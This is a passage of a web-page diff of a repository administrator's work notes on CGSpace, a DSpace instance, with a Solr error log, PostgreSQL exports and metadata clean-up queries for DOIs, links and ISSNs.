org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'read:(g0 OR e610 OR g0 OR g3 OR g5 OR g4102 OR g9 OR g4105 OR g10 OR g4107 OR g4108 OR g13 OR g4109 OR g14 OR g15 OR g16 OR g18 OR g20 OR g23 OR g24 OR g2072 OR g2074 OR g28 OR g2076 OR g29 OR g2078 OR g2080 OR g34 OR g2082 OR g2084 OR g38 OR g2086 OR g2088 OR g43 OR g2093 OR g2095 OR g2097 OR g50 OR g51 OR g2101 OR g2103 OR g62 OR g65 OR g77 OR g78 OR g2127 OR g2142 OR g2151 OR g2152 OR g2153 OR g2154 OR g2156 OR g2165 OR g2171 OR g2174 OR g2175 OR g129 OR g2178 OR g2182 OR g2186 OR g153 OR g155 OR g158 OR g166 OR g167 OR g168 OR g169 OR g2225 OR g179 OR g2227 OR g2229 OR g183 OR g2231 OR g184 OR g2233 OR g186 OR g2235 OR g2237 OR g191 OR g192 OR g193 OR g2242 OR g2244 OR g2246 OR g2250 OR g204 OR g205 OR g207 OR g208 OR g2262 OR g2265 OR g218 OR g2268 OR g222 OR g223 OR g2271 OR g2274 OR g2277 OR g230 OR g231 OR g2280 OR g2283 OR g238 OR g2286 OR g241 OR g2289 OR g244 OR g2292 OR g2295 OR g2298 OR g2301 OR g254 OR g255 OR g2305 OR g2308 OR g262 OR g2311 OR g265 OR g268 OR g269 OR g273 OR g276 OR g277 OR g279 OR g282 OR g292 OR g293 OR g296 OR g297 OR g301 OR g303 OR g305 OR g2353 OR g310 OR g311 OR g313 OR g321 OR g325 OR g328 OR g333 OR g334 OR g342 OR g343 OR g345 OR g348 OR g2409 [...] ': too many boolean clauses
<pre tabindex="0"><code>2020-01-27 06:02:23,681 ERROR org.dspace.app.xmlui.aspect.discovery.AbstractRecentSubmissionTransformer @ Caught SearchServiceException while retrieving recent submission for: home page
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;read:(g0 OR e610 OR g0 OR g3 OR g5 OR g4102 OR g9 OR g4105 OR g10 OR g4107 OR g4108 OR g13 OR g4109 OR g14 OR g15 OR g16 OR g18 OR g20 OR g23 OR g24 OR g2072 OR g2074 OR g28 OR g2076 OR g29 OR g2078 OR g2080 OR g34 OR g2082 OR g2084 OR g38 OR g2086 OR g2088 OR g43 OR g2093 OR g2095 OR g2097 OR g50 OR g51 OR g2101 OR g2103 OR g62 OR g65 OR g77 OR g78 OR g2127 OR g2142 OR g2151 OR g2152 OR g2153 OR g2154 OR g2156 OR g2165 OR g2171 OR g2174 OR g2175 OR g129 OR g2178 OR g2182 OR g2186 OR g153 OR g155 OR g158 OR g166 OR g167 OR g168 OR g169 OR g2225 OR g179 OR g2227 OR g2229 OR g183 OR g2231 OR g184 OR g2233 OR g186 OR g2235 OR g2237 OR g191 OR g192 OR g193 OR g2242 OR g2244 OR g2246 OR g2250 OR g204 OR g205 OR g207 OR g208 OR g2262 OR g2265 OR g218 OR g2268 OR g222 OR g223 OR g2271 OR g2274 OR g2277 OR g230 OR g231 OR g2280 OR g2283 OR g238 OR g2286 OR g241 OR g2289 OR g244 OR g2292 OR g2295 OR g2298 OR g2301 OR g254 OR g255 OR g2305 OR g2308 OR g262 OR g2311 OR g265 OR g268 OR g269 OR g273 OR g276 OR g277 OR g279 OR g282 OR g292 OR g293 OR g296 OR g297 OR g301 OR g303 OR g305 OR g2353 OR g310 OR g311 OR g313 OR g321 OR g325 OR g328 OR g333 OR g334 OR g342 OR g343 OR g345 OR g348 OR g2409 [...] &#39;: too many boolean clauses
</code></pre><ul>
<li>Now this appears to be a Solr limit of some kind (&ldquo;too many boolean clauses&rdquo;)
<ul>
@ -453,7 +453,7 @@ org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError:
<ul>
<li>Generate a list of CIP subjects for Abenet:</li>
</ul>
<pre><code>dspace=# \COPY (SELECT DISTINCT text_value as &quot;cg.subject.cip&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 127 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-28-cip-subjects.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;cg.subject.cip&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 127 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-28-cip-subjects.csv WITH CSV HEADER;
COPY 77
</code></pre><ul>
<li>Start looking over the IITA records from earlier this month (<a href="https://dspacetest.cgiar.org/handle/10568/106567">IITA_201907_Jan13</a>)
@ -483,33 +483,33 @@ COPY 77
<ul>
<li>Normalize about 4,500 DOI, YouTube, and SlideShare links on CGSpace that are missing HTTPS or using old format:</li>
</ul>
<pre><code>UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://www.doi.org', 'https://doi.org') WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE 'http://www.doi.org%';
UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://doi.org', 'https://doi.org') WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE 'http://doi.org%';
UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://dx.doi.org', 'https://doi.org') WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE 'http://dx.doi.org%';
UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'https://dx.doi.org', 'https://doi.org') WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE 'https://dx.doi.org%';
UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://www.youtube.com', 'https://www.youtube.com') WHERE resource_type_id = 2 AND metadata_field_id = 219 AND text_value LIKE 'http://www.youtube.com%';
UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://www.slideshare.net', 'https://www.slideshare.net') WHERE resource_type_id = 2 AND metadata_field_id = 219 AND text_value LIKE 'http://www.slideshare.net%';
<pre tabindex="0"><code>UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;http://www.doi.org&#39;, &#39;https://doi.org&#39;) WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE &#39;http://www.doi.org%&#39;;
UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;http://doi.org&#39;, &#39;https://doi.org&#39;) WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE &#39;http://doi.org%&#39;;
UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;http://dx.doi.org&#39;, &#39;https://doi.org&#39;) WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE &#39;http://dx.doi.org%&#39;;
UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;https://dx.doi.org&#39;, &#39;https://doi.org&#39;) WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE &#39;https://dx.doi.org%&#39;;
UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;http://www.youtube.com&#39;, &#39;https://www.youtube.com&#39;) WHERE resource_type_id = 2 AND metadata_field_id = 219 AND text_value LIKE &#39;http://www.youtube.com%&#39;;
UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;http://www.slideshare.net&#39;, &#39;https://www.slideshare.net&#39;) WHERE resource_type_id = 2 AND metadata_field_id = 219 AND text_value LIKE &#39;http://www.slideshare.net%&#39;;
</code></pre><ul>
<li>I exported a list of all of our ISSNs with item IDs so that I could fix them in OpenRefine and submit them with multi-value separators to DSpace metadata import:</li>
</ul>
<pre><code>dspace=# \COPY (SELECT resource_id as &quot;id&quot;, text_value as &quot;dc.identifier.issn&quot; FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 21) to /tmp/2020-01-29-issn.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT resource_id as &#34;id&#34;, text_value as &#34;dc.identifier.issn&#34; FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 21) to /tmp/2020-01-29-issn.csv WITH CSV HEADER;
COPY 23339
</code></pre><ul>
<li>Then, after spending two hours correcting 1,000 ISSNs I realized that I need to normalize the <code>text_lang</code> fields in the database first or else these will all look like changes due to the &ldquo;en_US&rdquo; and NULL, etc (for both ISSN and ISBN):</li>
</ul>
<pre><code>dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id = 2 AND metadata_field_id IN (20,21);
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE resource_type_id = 2 AND metadata_field_id IN (20,21);
UPDATE 30454
</code></pre><ul>
<li>Then I realized that my initial PostgreSQL query wasn&rsquo;t so genius because if a field already has multiple values it will appear on separate lines with the same ID, so when <code>dspace metadata-import</code> sees it, the change will be removed and added, or added and removed, depending on the order it is seen!</li>
<li>A better course of action is to select the distinct ones and then correct them using <code>fix-metadata-values.py</code>&hellip;</li>
</ul>
<pre><code>dspace=# \COPY (SELECT DISTINCT text_value as &quot;dc.identifier.issn[en_US]&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 21 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-29-issn-distinct.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;dc.identifier.issn[en_US]&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 21 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-29-issn-distinct.csv WITH CSV HEADER;
COPY 2900
</code></pre><ul>
<li>I re-applied all my corrections, filtering out things like multi-value separators and values that are actually ISBNs so I can fix them later</li>
<li>Then I applied 181 fixes for ISSNs using <code>fix-metadata-values.py</code> on DSpace Test and CGSpace (after testing locally):</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/2020-01-29-ISSNs-Distinct.csv -db dspace -u dspace -p 'fuuu' -f 'dc.identifier.issn[en_US]' -m 21 -t correct -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2020-01-29-ISSNs-Distinct.csv -db dspace -u dspace -p &#39;fuuu&#39; -f &#39;dc.identifier.issn[en_US]&#39; -m 21 -t correct -d
</code></pre><h2 id="2020-01-30">2020-01-30</h2>
<ul>
<li>About to start working on the DSpace 6 port and I&rsquo;m looking at commits that are in the not-yet-tagged DSpace 6.4:
@ -604,15 +604,15 @@ COPY 2900
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

Some files were not shown because too many files have changed in this diff Show More